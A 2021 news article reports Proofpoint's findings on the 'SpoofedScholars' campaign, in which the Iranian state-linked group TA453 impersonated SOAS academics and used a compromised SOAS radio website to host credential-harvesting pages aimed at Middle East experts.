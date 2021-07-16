An Iranian cyber-espionage campaign using spoofed identities of academics at a UK university to harvest data from various experts in Middle Eastern affairs has been uncovered.

Detailed by researchers at the cyber-security firm Proofpoint, the Iranian group was found to have compromised a real website affiliated with the School of Oriental and African Studies (SOAS), University of London, in an effort to deliver personalised credential-harvesting pages to targets under the guise of inviting them to a webinar on Middle Eastern issues.

Dubbed “SpoofedScholars”, Proofpoint revealed how hackers tried to establish communication with invites to fake conferences or events, and went as far as to request calls with the targets.

Proofpoint researchers linked the phishing campaign to an Advanced Persistent Threat (APT) group referred to as TA453 – also known as Charming Kitten and Phosphorus – they believe with “high confidence” to be a state-backed intelligence-gathering operation connected to the Islamic Revolutionary Guard Corps (IRGC), a wing of Iran’s armed forces.

What makes the group’s latest campaign concerning is how its tactics have evolved in complexity within a short period of time.

“TA453 typically uses actor controlled phishing pages to harvest their targets’ credentials, similar to the BadBlood campaign we reported on in March 2021,” said Sherrod DeGrippo, senior director of threat research and detection at Proofpoint.

“The use of a compromised site, especially one so topical like SOAS to TA453’s interest, is highly unusual and more sophisticated for this group,” she told TRT World.

In January 2021, emails sent from a Gmail address claiming to be from a senior teaching and research fellow at SOAS invited people to an online conference called “The US Security Challenges in the Middle East”.

Once a conversation was established, targets were then sent a “registration link” hosted by a dummy website belonging to SOAS radio, an independent online radio station based at SOAS, which was compromised by the hackers. It then offered log-on options via various email clients that could capture passwords and usernames.

It’s unclear whether the attackers were successful in stealing any information. After being informed, SOAS said no personal information was acquired and the compromised radio website was separate from its official website.